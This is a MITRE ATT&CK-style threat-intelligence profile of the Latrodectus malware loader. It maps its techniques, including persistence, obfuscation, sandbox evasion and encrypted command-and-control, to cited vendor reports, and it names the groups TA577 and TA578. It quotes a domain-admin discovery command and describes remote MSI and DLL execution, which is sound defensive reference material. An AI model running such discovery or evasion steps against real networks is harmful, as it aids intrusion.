Latrodectus
Associated Software Descriptions |
|
| Name | Description |
|---|---|
| IceNova | (Citation: Bleeping Computer Latrodectus April 2024) |
| Unidentified 111 | (Citation: Bleeping Computer Latrodectus April 2024) |
Techniques Used |
||||
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1087 | .002 | Account Discovery: Domain Account |
Latrodectus can run `C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain` to identify domain administrator accounts.(Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1071 | .001 | Application Layer Protocol: Web Protocols |
Latrodectus can send registration information to C2 via HTTP `POST`.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1547 | .001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Latrodectus can set an AutoRun key to establish persistence.(Citation: Latrodectus APR 2024) |
| Enterprise | T1059 | .003 | Command and Scripting Interpreter: Windows Command Shell |
The Latrodectus command handler can use `cmdexe` to run multiple discovery commands.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
| .007 | Command and Scripting Interpreter: JavaScript |
Latrodectus has used JavaScript files as part its infection chain during malicious spam email campaigns.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)(Citation: Palo Alto Latrodectus Activity June 2024) |
||
| Enterprise | T1132 | .001 | Data Encoding: Standard Encoding |
Latrodectus has Base64-encoded the message body of a HTTP request sent to C2.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1573 | .001 | Encrypted Channel: Symmetric Cryptography |
Latrodectus can send RC4 encrypted data over C2 channels.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1564 | .004 | Hide Artifacts: NTFS File Attributes |
Latrodectus can delete itself while its process is still running through the use of an alternate data stream.(Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1070 | .004 | Indicator Removal: File Deletion |
Latrodectus has the ability to delete itself.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1559 | .001 | Inter-Process Communication: Component Object Model |
Latrodectus can use the Windows Component Object Model (COM) to set scheduled tasks.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1036 | .005 | Masquerading: Match Legitimate Name or Location |
Latrodectus has been packed to appear as a component to Bitdefender’s kernel-mode driver, TRUFOS.SYS.(Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1027 | .001 | Obfuscated Files or Information: Binary Padding |
Latrodectus has been obfuscated with a 129 byte sequence of junk data prepended to the file.(Citation: Elastic Latrodectus May 2024) |
| .002 | Obfuscated Files or Information: Software Packing |
The Latrodectus payload has been packed for obfuscation.(Citation: Elastic Latrodectus May 2024) |
||
| .007 | Obfuscated Files or Information: Dynamic API Resolution |
Latrodectus can resolve Windows APIs dynamically by hash.(Citation: Latrodectus APR 2024) |
||
| .013 | Obfuscated Files or Information: Encrypted/Encoded File |
Latrodectus has used a pseudo random number generator (PRNG) algorithm and a rolling XOR key to obfuscate strings.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
||
| Enterprise | T1069 | .002 | Permission Groups Discovery: Domain Groups |
Latrodectus can identify domain groups through `cmd.exe /c net group "Domain Admins" /domain`.(Citation: Bitsight Latrodectus June 2024)(Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1566 | .001 | Phishing: Spearphishing Attachment |
Latrodectus has been distributed through reply-chain phishing emails with malicious attachments.(Citation: Bleeping Computer Latrodectus April 2024) |
| .002 | Phishing: Spearphishing Link |
Latrodectus has been distributed to victims through emails containing malicious links.(Citation: Latrodectus APR 2024)(Citation: Bleeping Computer Latrodectus April 2024) |
||
| Enterprise | T1021 | .005 | Remote Services: VNC |
Latrodectus has routed C2 traffic using Keyhole VNC.(Citation: Palo Alto Latrodectus Activity June 2024) |
| Enterprise | T1053 | .005 | Scheduled Task/Job: Scheduled Task |
Latrodectus can create scheduled tasks for persistence.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1518 | .001 | Software Discovery: Security Software Discovery |
Latrodectus has the ability to identify installed antivirus products.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1218 | .007 | System Binary Proxy Execution: Msiexec |
Latrodectus has called `msiexec` to install remotely-hosted MSI files.(Citation: Latrodectus APR 2024)(Citation: Bleeping Computer Latrodectus April 2024) |
| .011 | System Binary Proxy Execution: Rundll32 |
Latrodectus can use rundll32.exe to execute downloaded DLLs.(Citation: Elastic Latrodectus May 2024)(Citation: Bleeping Computer Latrodectus April 2024) |
||
| Enterprise | T1204 | .001 | User Execution: Malicious Link |
Latrodectus has been executed through malicious links distributed in email campaigns.(Citation: Latrodectus APR 2024)(Citation: Bleeping Computer Latrodectus April 2024) |
| .002 | User Execution: Malicious File |
Latrodectus has lured users into opening malicious email attachments for execution.(Citation: Bleeping Computer Latrodectus April 2024) |
||
| Enterprise | T1497 | .001 | Virtualization/Sandbox Evasion: System Checks |
Latrodectus can determine if it is running in a virtualized environment by checking the OS version, checking the number of running processes, ensuring a 64-bit application is running on a 64-bit host, and checking if the host has a valid MAC address.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024) |
Groups That Use This Software |
||
| ID | Name | References |
|---|---|---|
| G1037 | TA577 |
(Citation: Latrodectus APR 2024) |
| G1038 | TA578 |
(Citation: Bitsight Latrodectus June 2024) (Citation: Latrodectus APR 2024) |
References
- Abrams, L. (2024, April 30). New Latrodectus malware attacks use Microsoft, Cloudflare themes. Retrieved September 13, 2024.
- Batista, J. (2024, June 17). Latrodectus, are you coming back?. Retrieved September 13, 2024.
- Proofpoint Threat Research and Team Cymru S2 Threat Research. (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May 31, 2024.
- Unit 42. (2024, June 25). 2024-06-25-IOCs-from-Latrodectus-activity. Retrieved September 13, 2024.
- Stepanic, D. and Bousseaden, S. (2024, May 15). Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID. Retrieved September 13, 2024.
Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.